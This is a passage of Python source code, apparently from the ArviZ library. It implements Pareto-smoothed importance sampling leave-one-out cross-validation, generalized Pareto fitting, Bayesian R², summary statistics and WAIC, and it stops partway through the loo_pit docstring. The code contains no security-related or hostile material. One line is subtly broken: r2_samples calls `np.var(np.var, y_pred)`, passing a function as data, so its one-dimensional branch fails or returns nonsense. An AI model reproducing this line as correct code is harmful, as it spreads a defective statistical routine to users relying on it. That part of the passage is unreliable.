leave-one-out cross-validation (PSIS-LOO-CV). Also calculates LOO's\n standard error and the effective number of parameters. Read more theory here\n https://arxiv.org/abs/1507.04544 and here https://arxiv.org/abs/1507.02646\n\n Parameters\n ----------\n data: obj\n Any object that can be converted to an :class:`arviz.InferenceData` object.\n Refer to documentation of\n :func:`arviz.convert_to_dataset` for details.\n pointwise: bool, optional\n If True the pointwise predictive accuracy will be returned. Defaults to\n ``stats.ic_pointwise`` rcParam.\n var_name : str, optional\n The name of the variable in log_likelihood groups storing the pointwise log\n likelihood data to use for loo computation.\n reff: float, optional\n Relative MCMC efficiency, ``ess / n`` i.e. number of effective samples divided by the number\n of actual samples. Computed from trace by default.\n scale: str\n Output scale for loo. Available options are:\n\n - ``log`` : (default) log-score\n - ``negative_log`` : -1 * log-score\n - ``deviance`` : -2 * log-score\n\n A higher log-score (or a lower deviance or negative log_score) indicates a model with\n better predictive accuracy.\n\n Returns\n -------\n ELPDData object (inherits from :class:`pandas.Series`) with the following row/attributes:\n elpd: approximated expected log pointwise predictive density (elpd)\n se: standard error of the elpd\n p_loo: effective number of parameters\n shape_warn: bool\n True if the estimated shape parameter of\n Pareto distribution is greater than 0.7 for one or more samples\n loo_i: array of pointwise predictive accuracy, only if pointwise True\n pareto_k: array of Pareto shape values, only if pointwise True\n scale: scale of the elpd\n\n The returned object has a custom print method that overrides pd.Series method.\n\n See Also\n --------\n compare : Compare models based on PSIS-LOO loo or WAIC waic cross-validation.\n waic : Compute the widely applicable information criterion.\n plot_compare : Summary plot for model comparison.\n plot_elpd : Plot pointwise elpd differences between two or more models.\n plot_khat : Plot Pareto tail indices for diagnosing convergence.\n\n Examples\n --------\n Calculate LOO of a model:\n\n .. ipython::\n\n In [1]: import arviz as az\n ...: data = az.load_arviz_data(\"centered_eight\")\n ...: az.loo(data)\n\n Calculate LOO of a model and return the pointwise values:\n\n .. ipython::\n\n In [2]: data_loo = az.loo(data, pointwise=True)\n ...: data_loo.loo_i\n \"\"\"\n inference_data = convert_to_datatree(data)\n log_likelihood = _get_log_likelihood(inference_data, var_name=var_name)\n pointwise = rcParams[\"stats.ic_pointwise\"] if pointwise is None else pointwise\n\n log_likelihood = log_likelihood.stack(__sample__=(\"chain\", \"draw\"))\n shape = log_likelihood.shape\n n_samples = shape[-1]\n n_data_points = np.prod(shape[:-1])\n scale = rcParams[\"stats.ic_scale\"] if scale is None else scale.lower()\n\n if scale == \"deviance\":\n scale_value = -2\n elif scale == \"log\":\n scale_value = 1\n elif scale == \"negative_log\":\n scale_value = -1\n else:\n raise TypeError('Valid scale values are \"deviance\", \"log\", \"negative_log\"')\n\n if reff is None:\n if not hasattr(inference_data, \"posterior\"):\n raise TypeError(\"Must be able to extract a posterior group from data.\")\n posterior = inference_data.posterior\n n_chains = len(posterior.chain)\n if n_chains == 1:\n reff = 1.0\n else:\n ess_p = ess(posterior, method=\"mean\")\n # this mean is over all data variables\n reff = (\n np.hstack([ess_p[v].values.flatten() for v in ess_p.data_vars]).mean() / n_samples\n )\n\n log_weights, pareto_shape = psislw(-log_likelihood, reff)\n log_weights += log_likelihood\n\n warn_mg = False\n if np.any(pareto_shape > 0.7):\n warnings.warn(\n \"Estimated shape parameter of Pareto distribution is greater than 0.7 for \"\n \"one or more samples. You should consider using a more robust model, this is because \"\n \"importance sampling is less likely to work well if the marginal posterior and \"\n \"LOO posterior are very different. This is more likely to happen with a non-robust \"\n \"model and highly influential observations.\"\n )\n warn_mg = True\n\n ufunc_kwargs = {\"n_dims\": 1, \"ravel\": False}\n kwargs = {\"input_core_dims\": [[\"__sample__\"]]}\n loo_lppd_i = scale_value * _wrap_xarray_ufunc(\n _logsumexp, log_weights, ufunc_kwargs=ufunc_kwargs, **kwargs\n )\n loo_lppd = loo_lppd_i.values.sum()\n loo_lppd_se = (n_data_points * np.var(loo_lppd_i.values)) ** 0.5\n\n lppd = np.sum(\n _wrap_xarray_ufunc(\n _logsumexp,\n log_likelihood,\n func_kwargs={\"b_inv\": n_samples},\n ufunc_kwargs=ufunc_kwargs,\n **kwargs,\n ).values\n )\n p_loo = lppd - loo_lppd / scale_value\n\n if not pointwise:\n return ELPDData(\n kind=\"loo\",\n elpd=loo_lppd,\n se=loo_lppd_se,\n p=p_loo,\n n_samples=n_samples,\n n_data_points=n_data_points,\n scale=scale,\n warning=warn_mg,\n )\n if np.equal(loo_lppd, loo_lppd_i).all(): # pylint: disable=no-member\n warnings.warn(\n \"The point-wise LOO is the same with the sum LOO, please double check \"\n \"the Observed RV in your model to make sure it returns element-wise logp.\"\n )\n return ELPDData(\n kind=\"loo\",\n elpd=loo_lppd,\n se=loo_lppd_se,\n p=p_loo,\n n_samples=n_samples,\n n_data_points=n_data_points,\n warning=warn_mg,\n elpd_i=loo_lppd_i.rename(\"loo_i\"),\n pareto_k=pareto_shape,\n scale=scale,\n )\n\n\ndef psislw(log_weights, reff=1.0):\n \"\"\"\n Pareto smoothed importance sampling (PSIS).\n\n Notes\n -----\n If the ``log_weights`` input is an :class:`~xarray.DataArray` with a dimension\n named ``__sample__`` (recommended) ``psislw`` will interpret this dimension as samples,\n and all other dimensions as dimensions of the observed data, looping over them to\n calculate the psislw of each observation. If no ``__sample__`` dimension is present or\n the input is a numpy array, the last dimension will be interpreted as ``__sample__``.\n\n Parameters\n ----------\n log_weights: array\n Array of size (n_observations, n_samples)\n reff: float\n relative MCMC efficiency, ``ess / n``\n\n Returns\n -------\n lw_out: array\n Smoothed log weights\n kss: array\n Pareto tail indices\n\n References\n ----------\n * Vehtari et al. (2015) see https://arxiv.org/abs/1507.02646\n\n See Also\n --------\n loo : Compute Pareto-smoothed importance sampling leave-one-out cross-validation (PSIS-LOO-CV).\n\n Examples\n --------\n Get Pareto smoothed importance sampling (PSIS) log weights:\n\n .. ipython::\n\n In [1]: import arviz as az\n ...: data = az.load_arviz_data(\"non_centered_eight\")\n ...: log_likelihood = data.log_likelihood[\"obs\"].stack(\n ...: __sample__=[\"chain\", \"draw\"]\n ...: )\n ...: az.psislw(-log_likelihood, reff=0.8)\n\n \"\"\"\n if hasattr(log_weights, \"__sample__\"):\n n_samples = len(log_weights.__sample__)\n shape = [\n size for size, dim in zip(log_weights.shape, log_weights.dims) if dim != \"__sample__\"\n ]\n else:\n n_samples = log_weights.shape[-1]\n shape = log_weights.shape[:-1]\n # precalculate constants\n cutoff_ind = -int(np.ceil(min(n_samples / 5.0, 3 * (n_samples / reff) ** 0.5))) - 1\n cutoffmin = np.log(np.finfo(float).tiny) # pylint: disable=no-member, assignment-from-no-return\n\n # create output array with proper dimensions\n out = np.empty_like(log_weights), np.empty(shape)\n\n # define kwargs\n func_kwargs = {\"cutoff_ind\": cutoff_ind, \"cutoffmin\": cutoffmin, \"out\": out}\n ufunc_kwargs = {\"n_dims\": 1, \"n_output\": 2, \"ravel\": False, \"check_shape\": False}\n kwargs = {\"input_core_dims\": [[\"__sample__\"]], \"output_core_dims\": [[\"__sample__\"], []]}\n log_weights, pareto_shape = _wrap_xarray_ufunc(\n _psislw,\n log_weights,\n ufunc_kwargs=ufunc_kwargs,\n func_kwargs=func_kwargs,\n **kwargs,\n )\n if isinstance(log_weights, xr.DataArray):\n log_weights = log_weights.rename(\"log_weights\")\n if isinstance(pareto_shape, xr.DataArray):\n pareto_shape = pareto_shape.rename(\"pareto_shape\")\n return log_weights, pareto_shape\n\n\ndef _psislw(log_weights, cutoff_ind, cutoffmin):\n \"\"\"\n Pareto smoothed importance sampling (PSIS) for a 1D vector.\n\n Parameters\n ----------\n log_weights: array\n Array of length n_observations\n cutoff_ind: int\n cutoffmin: float\n k_min: float\n\n Returns\n -------\n lw_out: array\n Smoothed log weights\n kss: float\n Pareto tail index\n \"\"\"\n x = np.asarray(log_weights)\n\n # improve numerical accuracy\n x -= np.max(x)\n # sort the array\n x_sort_ind = np.argsort(x)\n # divide log weights into body and right tail\n xcutoff = max(x[x_sort_ind[cutoff_ind]], cutoffmin)\n\n expxcutoff = np.exp(xcutoff)\n (tailinds,) = np.where(x > xcutoff) # pylint: disable=unbalanced-tuple-unpacking\n x_tail = x[tailinds]\n tail_len = len(x_tail)\n if tail_len <= 4:\n # not enough tail samples for gpdfit\n k = np.inf\n else:\n # order of tail samples\n x_tail_si = np.argsort(x_tail)\n # fit generalized Pareto distribution to the right tail samples\n x_tail = np.exp(x_tail) - expxcutoff\n k, sigma = _gpdfit(x_tail[x_tail_si])\n\n if np.isfinite(k):\n # no smoothing if GPD fit failed\n # compute ordered statistic for the fit\n sti = np.arange(0.5, tail_len) / tail_len\n smoothed_tail = _gpinv(sti, k, sigma)\n smoothed_tail = np.log( # pylint: disable=assignment-from-no-return\n smoothed_tail + expxcutoff\n )\n # place the smoothed tail into the output array\n x[tailinds[x_tail_si]] = smoothed_tail\n # truncate smoothed values to the largest raw weight 0\n x[x > 0] = 0\n # renormalize weights\n x -= _logsumexp(x)\n\n return x, k\n\n\ndef _gpdfit(ary):\n \"\"\"Estimate the parameters for the Generalized Pareto Distribution (GPD).\n\n Empirical Bayes estimate for the parameters of the generalized Pareto\n distribution given the data.\n\n Parameters\n ----------\n ary: array\n sorted 1D data array\n\n Returns\n -------\n k: float\n estimated shape parameter\n sigma: float\n estimated scale parameter\n \"\"\"\n prior_bs = 3\n prior_k = 10\n n = len(ary)\n m_est = 30 + int(n**0.5)\n\n b_ary = 1 - np.sqrt(m_est / (np.arange(1, m_est + 1, dtype=float) - 0.5))\n b_ary /= prior_bs * ary[int(n / 4 + 0.5) - 1]\n b_ary += 1 / ary[-1]\n\n k_ary = np.log1p(-b_ary[:, None] * ary).mean(axis=1) # pylint: disable=no-member\n len_scale = n * (np.log(-(b_ary / k_ary)) - k_ary - 1)\n weights = 1 / np.exp(len_scale - len_scale[:, None]).sum(axis=1)\n\n # remove negligible weights\n real_idxs = weights >= 10 * np.finfo(float).eps\n if not np.all(real_idxs):\n weights = weights[real_idxs]\n b_ary = b_ary[real_idxs]\n # normalise weights\n weights /= weights.sum()\n\n # posterior mean for b\n b_post = np.sum(b_ary * weights)\n # estimate for k\n k_post = np.log1p(-b_post * ary).mean() # pylint: disable=invalid-unary-operand-type,no-member\n # add prior for k_post\n sigma = -k_post / b_post\n k_post = (n * k_post + prior_k * 0.5) / (n + prior_k)\n\n return k_post, sigma\n\n\ndef _gpinv(probs, kappa, sigma):\n \"\"\"Inverse Generalized Pareto distribution function.\"\"\"\n # pylint: disable=unsupported-assignment-operation, invalid-unary-operand-type\n x = np.full_like(probs, np.nan)\n if sigma <= 0:\n return x\n is_prob = (probs > 0) & (probs < 1)\n if np.all(is_prob):\n if np.abs(kappa) < np.finfo(float).eps:\n x = -np.log1p(-probs)\n else:\n x = np.expm1(-kappa * np.log1p(-probs)) / kappa\n x *= sigma\n else:\n if np.abs(kappa) < np.finfo(float).eps:\n x[is_prob] = -np.log1p(-probs[is_prob])\n else:\n x[is_prob] = np.expm1(-kappa * np.log1p(-probs[is_prob])) / kappa\n x *= sigma\n x[probs == 0] = 0\n x[probs == 1] = np.inf if kappa >= 0 else -sigma / kappa\n return x\n\n\ndef r2_samples(y_true, y_pred):\n \"\"\"R² samples for Bayesian regression models. Only valid for linear models.\n\n Parameters\n ----------\n y_true: array-like of shape = (n_outputs,)\n Ground truth (correct) target values.\n y_pred: array-like of shape = (n_posterior_samples, n_outputs)\n Estimated target values.\n\n Returns\n -------\n Pandas Series with the following indices:\n Bayesian R² samples.\n\n See Also\n --------\n plot_lm : Posterior predictive and mean plots for regression-like data.\n\n Examples\n --------\n Calculate R² samples for Bayesian regression models :\n\n .. ipython::\n\n In [1]: import arviz as az\n ...: data = az.load_arviz_data('regression1d')\n ...: y_true = data.observed_data[\"y\"].values\n ...: y_pred = data.posterior_predictive.stack(sample=(\"chain\", \"draw\"))[\"y\"].values.T\n ...: az.r2_samples(y_true, y_pred)\n\n \"\"\"\n if y_pred.ndim == 1:\n var_y_est = np.var(np.var, y_pred)\n var_e = np.var((y_true - y_pred))\n else:\n var_y_est = np.var(y_pred, axis=1)\n var_e = np.var((y_true - y_pred), axis=1)\n r_squared = var_y_est / (var_y_est + var_e)\n\n return r_squared\n\n\ndef r2_score(y_true, y_pred):\n \"\"\"R² for Bayesian regression models. Only valid for linear models.\n\n Parameters\n ----------\n y_true: array-like of shape = (n_outputs,)\n Ground truth (correct) target values.\n y_pred: array-like of shape = (n_posterior_samples, n_outputs)\n Estimated target values.\n\n Returns\n -------\n Pandas Series with the following indices:\n r2: Bayesian R²\n r2_std: standard deviation of the Bayesian R².\n\n See Also\n --------\n plot_lm : Posterior predictive and mean plots for regression-like data.\n\n Examples\n --------\n Calculate R² for Bayesian regression models :\n\n .. ipython::\n\n In [1]: import arviz as az\n ...: data = az.load_arviz_data('regression1d')\n ...: y_true = data.observed_data[\"y\"].values\n ...: y_pred = data.posterior_predictive.stack(sample=(\"chain\", \"draw\"))[\"y\"].values.T\n ...: az.r2_score(y_true, y_pred)\n\n \"\"\"\n r_squared = r2_samples(y_true=y_true, y_pred=y_pred)\n return pd.Series([np.mean(r_squared), np.std(r_squared)], index=[\"r2\", \"r2_std\"])\n\n\ndef summary(\n data,\n var_names: Optional[List[str]] = None,\n filter_vars=None,\n group=None,\n fmt: \"Literal['wide', 'long', 'xarray']\" = \"wide\",\n kind: \"Literal['all', 'stats', 'diagnostics']\" = \"all\",\n round_to=None,\n circ_var_names=None,\n stat_focus=\"mean\",\n stat_funcs=None,\n extend=True,\n ci_prob=None,\n skipna=False,\n labeller=None,\n coords=None,\n) -> Union[pd.DataFrame, xr.Dataset]:\n \"\"\"Create a data frame with summary statistics.\n\n Parameters\n ----------\n data: obj\n Any object that can be converted to an :class:`arviz.InferenceData` object\n Refer to documentation of :func:`arviz.convert_to_dataset` for details\n var_names: list\n Names of variables to include in summary. Prefix the variables by ``~`` when you\n want to exclude them from the summary: `[\"~beta\"]` instead of `[\"beta\"]` (see\n examples below).\n filter_vars: {None, \"like\", \"regex\"}, optional, default=None\n If `None` (default), interpret var_names as the real variables names. If \"like\",\n interpret var_names as substrings of the real variables names. If \"regex\",\n interpret var_names as regular expressions on the real variables names. A la\n ``pandas.filter``.\n coords: Dict[str, List[Any]], optional\n Coordinate subset for which to calculate the summary.\n group: str\n Select a group for summary. Defaults to \"posterior\", \"prior\" or first group\n in that order, depending what groups exists.\n fmt: {'wide', 'long', 'xarray'}\n Return format is either pandas.DataFrame {'wide', 'long'} or xarray.Dataset {'xarray'}.\n kind: {'all', 'stats', 'diagnostics'}\n Whether to include the `stats`: `mean`, `sd`, `hdi_3%`, `hdi_97%`, or the `diagnostics`:\n `mcse_mean`, `mcse_sd`, `ess_bulk`, `ess_tail`, and `r_hat`. Default to include `all` of\n them.\n round_to: int\n Number of decimals used to round results. Defaults to 2. Use \"none\" to return raw numbers.\n circ_var_names: list\n A list of circular variables to compute circular stats for\n stat_focus : str, default \"mean\"\n Select the focus for summary.\n stat_funcs: dict\n A list of functions or a dict of functions with function names as keys used to calculate\n statistics. By default, the mean, standard deviation, simulation standard error, and\n highest posterior density intervals are included.\n\n The functions will be given one argument, the samples for a variable as an nD array,\n The functions should be in the style of a ufunc and return a single number. For example,\n :func:`numpy.mean`, or ``scipy.stats.var`` would both work.\n extend: boolean\n If True, use the statistics returned by ``stat_funcs`` in addition to, rather than in place\n of, the default statistics. This is only meaningful when ``stat_funcs`` is not None.\n ci_prob: float, optional\n Highest density interval to compute. Defaults to 0.94. This is only meaningful when\n ``stat_funcs`` is None.\n skipna: bool\n If true ignores nan values when computing the summary statistics, it does not affect the\n behaviour of the functions passed to ``stat_funcs``. Defaults to false.\n labeller : labeller instance, optional\n Class providing the method `make_label_flat` to generate the labels in the plot titles.\n For more details on ``labeller`` usage see :ref:`label_guide`\n\n Returns\n -------\n pandas.DataFrame or xarray.Dataset\n Return type dicated by `fmt` argument.\n\n Return value will contain summary statistics for each variable. Default statistics depend on\n the value of ``stat_focus``:\n\n ``stat_focus=\"mean\"``: `mean`, `sd`, `hdi_3%`, `hdi_97%`, `mcse_mean`, `mcse_sd`,\n `ess_bulk`, `ess_tail`, and `r_hat`\n\n ``stat_focus=\"median\"``: `median`, `mad`, `eti_3%`, `eti_97%`, `mcse_median`, `ess_median`,\n `ess_tail`, and `r_hat`\n\n `r_hat` is only computed for traces with 2 or more chains.\n\n See Also\n --------\n waic : Compute the widely applicable information criterion.\n loo : Compute Pareto-smoothed importance sampling leave-one-out\n cross-validation (PSIS-LOO-CV).\n ess : Calculate estimate of the effective sample size (ess).\n rhat : Compute estimate of rank normalized splitR-hat for a set of traces.\n mcse : Calculate Markov Chain Standard Error statistic.\n\n Examples\n --------\n .. ipython::\n\n In [1]: import arviz as az\n ...: data = az.load_arviz_data(\"centered_eight\")\n ...: az.summary(data, var_names=[\"mu\", \"tau\"])\n\n You can use ``filter_vars`` to select variables without having to specify all the exact\n names. Use ``filter_vars=\"like\"`` to select based on partial naming:\n\n .. ipython::\n\n In [1]: az.summary(data, var_names=[\"the\"], filter_vars=\"like\")\n\n Use ``filter_vars=\"regex\"`` to select based on regular expressions, and prefix the variables\n you want to exclude by ``~``. Here, we exclude from the summary all the variables\n starting with the letter t:\n\n .. ipython::\n\n In [1]: az.summary(data, var_names=[\"~^t\"], filter_vars=\"regex\")\n\n Other statistics can be calculated by passing a list of functions\n or a dictionary with key, function pairs.\n\n .. ipython::\n\n In [1]: import numpy as np\n ...: def median_sd(x):\n ...: median = np.percentile(x, 50)\n ...: sd = np.sqrt(np.mean((x-median)**2))\n ...: return sd\n ...:\n ...: func_dict = {\n ...: \"std\": np.std,\n ...: \"median_std\": median_sd,\n ...: \"5%\": lambda x: np.percentile(x, 5),\n ...: \"median\": lambda x: np.percentile(x, 50),\n ...: \"95%\": lambda x: np.percentile(x, 95),\n ...: }\n ...: az.summary(\n ...: data,\n ...: var_names=[\"mu\", \"tau\"],\n ...: stat_funcs=func_dict,\n ...: extend=False\n ...: )\n\n Use ``stat_focus`` to change the focus of summary statistics obatined to median:\n\n .. ipython::\n\n In [1]: az.summary(data, stat_focus=\"median\")\n\n \"\"\"\n _log.cache = []\n\n if coords is None:\n coords = {}\n\n if labeller is None:\n labeller = BaseLabeller()\n if ci_prob is None:\n ci_prob = rcParams[\"stats.ci_prob\"]\n elif not 1 >= ci_prob > 0:\n raise ValueError(\"The value of ci_prob should be in the interval (0, 1]\")\n\n if isinstance(data, DataTree):\n if group is None:\n if not data.children:\n raise TypeError(\"DataTree does not contain any groups\")\n if \"posterior\" in data:\n dataset = convert_to_dataset(data, group=\"posterior\")\n elif \"prior\" in data:\n dataset = convert_to_dataset(data, group=\"prior\")\n else:\n first_group = list(data.children.keys())[0]\n warnings.warn(f\"Selecting first found group: {first_group}\")\n dataset = convert_to_dataset(data, group=first_group)\n elif group in data.children:\n dataset = convert_to_dataset(data, group=group)\n else:\n raise TypeError(f\"DataTree does not contain group: {group}\")\n else:\n dataset = convert_to_dataset(data, group=\"posterior\")\n var_names = _var_names(var_names, dataset, filter_vars)\n dataset = dataset if var_names is None else dataset[var_names]\n dataset = _get_coords(dataset, coords)\n\n fmt_group = (\"wide\", \"long\", \"xarray\")\n if not isinstance(fmt, str) or (fmt.lower() not in fmt_group):\n raise TypeError(f\"Invalid format: '{fmt}'. Formatting options are: {fmt_group}\")\n\n kind_group = (\"all\", \"stats\", \"diagnostics\")\n if not isinstance(kind, str) or kind not in kind_group:\n raise TypeError(f\"Invalid kind: '{kind}'. Kind options are: {kind_group}\")\n\n focus_group = (\"mean\", \"median\")\n if not isinstance(stat_focus, str) or (stat_focus not in focus_group):\n raise TypeError(f\"Invalid format: '{stat_focus}'. Focus options are: {focus_group}\")\n\n if stat_focus != \"mean\" and circ_var_names is not None:\n raise TypeError(f\"Invalid format: Circular stats not supported for '{stat_focus}'\")\n\n alpha = 1 - ci_prob\n\n extra_metrics = []\n extra_metric_names = []\n\n if stat_funcs is not None:\n if isinstance(stat_funcs, dict):\n for stat_func_name, stat_func in stat_funcs.items():\n extra_metrics.append(\n xr.apply_ufunc(\n _make_ufunc(stat_func), dataset, input_core_dims=((\"chain\", \"draw\"),)\n )\n )\n extra_metric_names.append(stat_func_name)\n else:\n for stat_func in stat_funcs:\n extra_metrics.append(\n xr.apply_ufunc(\n _make_ufunc(stat_func), dataset, input_core_dims=((\"chain\", \"draw\"),)\n )\n )\n extra_metric_names.append(stat_func.__name__)\n\n metrics: List[xr.Dataset] = []\n metric_names: List[str] = []\n if extend and kind in [\"all\", \"stats\"]:\n if stat_focus == \"mean\":\n mean = dataset.mean(dim=(\"chain\", \"draw\"), skipna=skipna)\n\n sd = dataset.std(dim=(\"chain\", \"draw\"), ddof=1, skipna=skipna)\n\n hdi_post = dataset.azstats.hdi(prob=ci_prob, multimodal=False, skipna=skipna)\n hdi_lower = hdi_post.sel(hdi=\"lower\", drop=True)\n hdi_higher = hdi_post.sel(hdi=\"higher\", drop=True)\n metrics.extend((mean, sd, hdi_lower, hdi_higher))\n metric_names.extend(\n (\"mean\", \"sd\", f\"hdi_{100 * alpha / 2:g}%\", f\"hdi_{100 * (1 - alpha / 2):g}%\")\n )\n elif stat_focus == \"median\":\n median = dataset.median(dim=(\"chain\", \"draw\"), skipna=skipna)\n\n mad = stats.median_abs_deviation(dataset, dims=(\"chain\", \"draw\"))\n eti_post = dataset.quantile(\n (alpha / 2, 1 - alpha / 2), dim=(\"chain\", \"draw\"), skipna=skipna\n )\n eti_lower = eti_post.isel(quantile=0, drop=True)\n eti_higher = eti_post.isel(quantile=1, drop=True)\n metrics.extend((median, mad, eti_lower, eti_higher))\n metric_names.extend(\n (\"median\", \"mad\", f\"eti_{100 * alpha / 2:g}%\", f\"eti_{100 * (1 - alpha / 2):g}%\")\n )\n\n if circ_var_names:\n nan_policy = \"omit\" if skipna else \"propagate\"\n circ_mean = stats.circmean(\n dataset, dims=[\"chain\", \"draw\"], high=np.pi, low=-np.pi, nan_policy=nan_policy\n )\n circ_sd = stats.circstd(\n dataset, dims=[\"chain\", \"draw\"], high=np.pi, low=-np.pi, nan_policy=nan_policy\n )\n circ_mcse = xr.apply_ufunc(\n _make_ufunc(_mc_error),\n dataset,\n kwargs={\"circular\": True},\n input_core_dims=((\"chain\", \"draw\"),),\n )\n\n circ_hdi = hdi(dataset, prob=ci_prob, circular=True, skipna=skipna)\n circ_hdi_lower = circ_hdi.sel(hdi=\"lower\", drop=True)\n circ_hdi_higher = circ_hdi.sel(hdi=\"higher\", drop=True)\n\n if kind in [\"all\", \"diagnostics\"] and extend:\n diagnostics_names: Tuple[str, ...]\n if stat_focus == \"mean\":\n diagnostics = xr.apply_ufunc(\n _make_ufunc(_multichain_statistics, n_output=5, ravel=False),\n dataset,\n input_core_dims=((\"chain\", \"draw\"),),\n output_core_dims=tuple([] for _ in range(5)),\n )\n diagnostics_names = (\n \"mcse_mean\",\n \"mcse_sd\",\n \"ess_bulk\",\n \"ess_tail\",\n \"r_hat\",\n )\n\n elif stat_focus == \"median\":\n diagnostics = xr.apply_ufunc(\n _make_ufunc(_multichain_statistics, n_output=4, ravel=False),\n dataset,\n kwargs={\"focus\": \"median\"},\n input_core_dims=((\"chain\", \"draw\"),),\n output_core_dims=tuple([] for _ in range(4)),\n )\n diagnostics_names = (\n \"mcse_median\",\n \"ess_median\",\n \"ess_tail\",\n \"r_hat\",\n )\n metrics.extend(diagnostics)\n metric_names.extend(diagnostics_names)\n\n if circ_var_names and kind != \"diagnostics\" and stat_focus == \"mean\":\n for metric, circ_stat in zip(\n # Replace only the first 5 statistics for their circular equivalent\n metrics[:5],\n (circ_mean, circ_sd, circ_hdi_lower, circ_hdi_higher, circ_mcse),\n ):\n for circ_var in circ_var_names:\n metric[circ_var] = circ_stat[circ_var]\n\n metrics.extend(extra_metrics)\n metric_names.extend(extra_metric_names)\n joined = (\n xr.concat(metrics, dim=\"metric\").assign_coords(metric=metric_names).reset_coords(drop=True)\n )\n n_metrics = len(metric_names)\n n_vars = np.sum([joined[var].size // n_metrics for var in joined.data_vars])\n\n if fmt.lower() == \"wide\":\n summary_df = pd.DataFrame(\n (np.full((cast(int, n_vars), n_metrics), np.nan)), columns=metric_names\n )\n indices = []\n for i, (var_name, sel, isel, values) in enumerate(\n xarray_var_iter(joined, skip_dims={\"metric\"})\n ):\n summary_df.iloc[i] = values\n indices.append(labeller.make_label_flat(var_name, sel, isel))\n summary_df.index = indices\n elif fmt.lower() == \"long\":\n df = joined.to_dataframe().reset_index().set_index(\"metric\")\n df.index = list(df.index)\n summary_df = df\n else:\n # format is 'xarray'\n summary_df = joined\n if (round_to is not None) and (round_to not in (\"None\", \"none\")):\n summary_df = summary_df.round(round_to)\n elif round_to not in (\"None\", \"none\") and (fmt.lower() in (\"long\", \"wide\")):\n # Don't round xarray object by default (even with \"none\")\n decimals = {\n col: 3 if col not in {\"ess_bulk\", \"ess_tail\", \"r_hat\"} else 2 if col == \"r_hat\" else 0\n for col in summary_df.columns\n }\n summary_df = summary_df.round(decimals)\n\n return summary_df\n\n\ndef waic(data, pointwise=None, var_name=None, scale=None, **kwargs):\n \"\"\"Compute the widely applicable information criterion.\n\n Estimates the expected log pointwise predictive density (elpd) using WAIC. Also calculates the\n WAIC's standard error and the effective number of parameters.\n Read more theory here https://arxiv.org/abs/1507.04544 and here https://arxiv.org/abs/1004.2316\n\n Parameters\n ----------\n data: obj\n Any object that can be converted to an :class:`arviz.InferenceData` object.\n Refer to documentation of :func:`arviz.convert_to_datatree` for details.\n pointwise: bool\n If True the pointwise predictive accuracy will be returned. Defaults to\n ``stats.ic_pointwise`` rcParam.\n var_name : str, optional\n The name of the variable in log_likelihood groups storing the pointwise log\n likelihood data to use for waic computation.\n scale: str\n Output scale for WAIC. Available options are:\n\n - `log` : (default) log-score\n - `negative_log` : -1 * log-score\n - `deviance` : -2 * log-score\n\n A higher log-score (or a lower deviance or negative log_score) indicates a model with\n better predictive accuracy.\n **kwargs : dict, optional\n Keyword arguments passed to :func:`~arviz.wrap_xarray_ufunc`.\n\n Returns\n -------\n ELPDData object (inherits from :class:`pandas.Series`) with the following row/attributes:\n elpd_waic: approximated expected log pointwise predictive density (elpd)\n se: standard error of the elpd\n p_waic: effective number parameters\n var_warn: bool\n True if posterior variance of the log predictive densities exceeds 0.4\n waic_i: :class:`~xarray.DataArray` with the pointwise predictive accuracy,\n only if pointwise=True\n scale: scale of the elpd\n\n The returned object has a custom print method that overrides pd.Series method.\n\n See Also\n --------\n loo : Compute Pareto-smoothed importance sampling leave-one-out cross-validation (PSIS-LOO-CV).\n compare : Compare models based on PSIS-LOO-CV or WAIC.\n plot_compare : Summary plot for model comparison.\n\n Examples\n --------\n Calculate WAIC of a model:\n\n .. ipython::\n\n In [1]: import arviz as az\n ...: data = az.load_arviz_data(\"centered_eight\")\n ...: az.waic(data)\n\n Calculate WAIC of a model and return the pointwise values:\n\n .. ipython::\n\n In [2]: data_waic = az.waic(data, pointwise=True)\n ...: data_waic.waic_i\n \"\"\"\n inference_data = convert_to_datatree(data)\n log_likelihood = _get_log_likelihood(inference_data, var_name=var_name)\n scale = rcParams[\"stats.ic_scale\"] if scale is None else scale.lower()\n pointwise = rcParams[\"stats.ic_pointwise\"] if pointwise is None else pointwise\n\n if scale == \"deviance\":\n scale_value = -2\n elif scale == \"log\":\n scale_value = 1\n elif scale == \"negative_log\":\n scale_value = -1\n else:\n raise TypeError('Valid scale values are \"deviance\", \"log\", \"negative_log\"')\n\n log_likelihood = log_likelihood.stack(__sample__=(\"chain\", \"draw\"))\n shape = log_likelihood.shape\n n_samples = shape[-1]\n n_data_points = np.prod(shape[:-1])\n\n ufunc_kwargs = {\"n_dims\": 1, \"ravel\": False}\n kwargs.setdefault(\"input_core_dims\", [[\"__sample__\"]])\n lppd_i = _wrap_xarray_ufunc(\n _logsumexp,\n log_likelihood,\n func_kwargs={\"b_inv\": n_samples},\n ufunc_kwargs=ufunc_kwargs,\n **kwargs,\n )\n\n vars_lpd = log_likelihood.var(dim=\"__sample__\")\n warn_mg = False\n if np.any(vars_lpd > 0.4):\n warnings.warn(\n (\n \"For one or more samples the posterior variance of the log predictive \"\n \"densities exceeds 0.4. This could be indication of WAIC starting to fail. \\n\"\n \"See http://arxiv.org/abs/1507.04544 for details\"\n )\n )\n warn_mg = True\n\n waic_i = scale_value * (lppd_i - vars_lpd)\n waic_se = (n_data_points * np.var(waic_i.values)) ** 0.5\n waic_sum = np.sum(waic_i.values)\n p_waic = np.sum(vars_lpd.values)\n\n if not pointwise:\n return ELPDData(\n kind=\"waic\",\n elpd=waic_sum,\n se=waic_se,\n p=p_waic,\n n_samples=n_samples,\n n_data_points=n_data_points,\n warning=warn_mg,\n scale=scale,\n )\n if np.equal(waic_sum, waic_i).all(): # pylint: disable=no-member\n warnings.warn(\n \"\"\"The point-wise WAIC is the same with the sum WAIC, please double check\n the Observed RV in your model to make sure it returns element-wise logp.\n \"\"\"\n )\n return ELPDData(\n kind=\"waic\",\n elpd=waic_sum,\n se=waic_se,\n p=p_waic,\n n_samples=n_samples,\n n_data_points=n_data_points,\n warning=warn_mg,\n scale=scale,\n elpd_i=waic_i.rename(\"waic_i\"),\n )\n\n\ndef loo_pit(idata=None, *, y=None, y_hat=None, log_weights=None):\n \"\"\"Compute leave one out (PSIS-LOO) probability integral transform (PIT) values.\n\n Parameters\n ----------\n idata: InferenceData\n :class:`arviz.InferenceData` object.\n y: array, DataArray or str\n Observed data. If str, ``idata`` must be present and contain the observed data group\n y_hat: array, DataArray or str\n Posterior predictive samples for ``y``. It must have the same shape as y plus an\n extra dimension at the end of size n_samples (chains and draws stacked). If str or\n None, ``idata`` must contain the posterior predictive group. If None, y_hat is taken\n equal to y, thus, y must be str too.\n log_weights: array or DataArray\n 